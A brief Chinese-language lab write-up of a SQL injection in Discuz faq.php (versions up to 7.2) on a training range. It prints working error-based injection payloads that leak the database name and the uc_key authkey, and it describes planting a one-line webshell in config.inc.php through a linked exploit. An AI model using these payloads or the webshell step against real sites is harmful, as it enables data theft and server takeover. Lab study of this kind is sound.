靶场地址:
https://www.mozhe.cn/bug/detail/dS85cFFTQnl1cUZHa3BsTklJd25adz09bW96aGUmozhe
漏洞概述:在Discuz的faq.php页面上存在sql注入,原因是没有对变量的类型进行严格规定
影响范围:Discuz <= 7.2
测试代码,获得当前数据库名:
action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
起初是以为暴库找key,发现找不到,换种方法,查询发现
从Discuz 3.x开始就有利用uc_key来获取shell的方法,通过注入来获取uc_key,代码:
faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,62) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23
利用网上exp脚本,由于exp脚本太长了,直接发出处:https://www.freebuf.com/vuls/37643.html
该exp不用自己获取uc_key,并在根目录的config.inc.php注入一句话木马,使用菜刀连接,密码为i0day,找到key
